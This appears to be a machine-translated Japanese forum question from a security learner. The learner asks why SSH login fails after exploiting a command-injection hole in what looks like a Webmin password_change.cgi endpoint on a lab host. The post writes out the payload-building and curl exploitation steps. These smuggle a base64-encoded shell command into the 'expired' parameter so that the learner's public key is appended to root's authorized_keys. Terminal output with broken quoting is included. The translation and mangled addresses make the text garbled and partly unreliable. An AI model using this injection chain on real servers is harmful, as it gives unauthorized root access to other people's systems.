SSH：権限が拒否されました（公開鍵、パスワード）

サイバーセキュリティに初めて接する方は私と一緒にしてください。学習状況であり、今後進むために最善を尽くしています。ペイロードなどを準備してコーディングする必要があります。私はこの4つのステップを実行しました。
パブリック/プライベートRSAキーペアを作成した後にパスワードを入力してもSSH経由でサーバーにアクセスできないのはなぜですか？ -[Eメール保護]：許可が拒否されました（公開鍵、パスワード）要求された生成された鍵を入力しましたが、運がなく、foobar1も機能せず、（公開鍵とパスワード）の組み合わせも機能しませんでした。私はこれを試しました。 ssh-copy-id -i ~/.ssh/id_rsa[Eメール保護]（動作しない、引き続きパスワードを要求する） 一番下の最後の部分が混乱していますね！どのように書くべきですか？誰もが問題を解決するために明確さ/指針を提供できますか？次のように端末で完全な段階的なプロセスを提供しました。

root@kali:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/.ssh/id_rsa
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:Hp6lH+aI8JAlpRWQ1b8DGzxWOwbu6YGq6znjzP6sDKs root@kali
The key's randomart image is:
+---[RSA 3072]----+
|    .+o.         |
|    .  .o .      |
|      oo + .     |
|     +  B =      |
|    o .+SB.o     |
|     +.o==o      |
|.   +. .=.o.     |
| *oo.+ ..= .     |
|E+%Bo o . o      |
+----[SHA256]-----+
root@kali:~# echo -n '$COMMAND' | base64 -w 0      
JENPTU1BTkQ=root@kali:~# PAYLOAD="echo%20$(echo "JENPTU1BTkQ=" | base64 -d)|sh"
root@kali:~# PAYLOAD=$(echo $PAYLOAD | sed 's/%/%25/g; s/ /%20/g; s/|/%7C/g')  
root@kali:~# PAYLOAD="echo%20JENPTU1BTkQ=%3D%7Cbase64%20-d%7Csh"
root@kali:~#  curl -ks "http://192.168.6.2:10000/password_change.cgi" -d user=root&pam=&expired=2;
PAYLOAD="echo%20JENPTU1BTkQ=%3D%7Cbase64%20-d%7Csh"&old=foobar&new1=foobar1&new2=foobar1 
[1] 1922
[2] 1923
[3] 1924
[4] 1925
[5] 1926

[1]   Done                    curl -ks "http://192.168.6.2:10000/password_change.cgi" -d user=root
[2]   Done                    pam=
[3]   Done                    PAYLOAD="echo%20Q09NTUFORA==%3D%7Cbase64%20-d%7Csh"
[4]-  Done                    old=foobar
[5]+  Done                    new1=foobar1
root@kali:~# ssh [email protected]
[email protected]'s password: Hp6lH+aI8JAlpRWQ1b8DGzxWOwbu6YGq6znjzP6sDKs
Permission denied, please try again.
[email protected]: Permission denied (publickey,password).

(attempted to copy key to target server)
root@kali:~# ssh-copy-id [email protected]
/usr/bin/ssh-copy-id: INFO: Source of key(s) to be installed: "/root/.ssh/id_rsa.pub"
/usr/bin/ssh-copy-id: INFO: attempting to log in with the new key(s), to filter out any that are already installed
/usr/bin/ssh-copy-id: INFO: 1 key(s) remain to be installed -- if you are prompted now it is to install the new keys
[email protected]'s password: foobar1 
Permission denied, please try again.

次のコマンドを実行してWebサービスを利用し、SSHキーを追加します。

SSHキーを追加するために、ターゲットサーバーで実行するコマンドを準備します。 COMMAND="echo '$(cat ~/.ssh/id_rsa.pub)' >> /root/.ssh/authorized_keys" (完了) payload PAYLOAD="echo%20$(echo "$COMMAND" | base64 -w 0 )|base64%20-d|sh" (完了) RCE 脆弱性の悪用とペイロードの実行 (非常に混乱し、一部が不要に見える) - シェルを試みるバックグラウンドでいくつかのタスクを実行します (ほとんどのサブシェルで変数を特定する値に設定し、その変数と値が失われた状態で終了します。 cur -ks "http://192.168.6.2: 10000/password_change.cgi" - d "user=root&pam=&expired=2;$PAYLOAD&old=foobar&new1=foobar1&new2=foobar1" -H "推奨ソース:http://192.168.6.2:10000"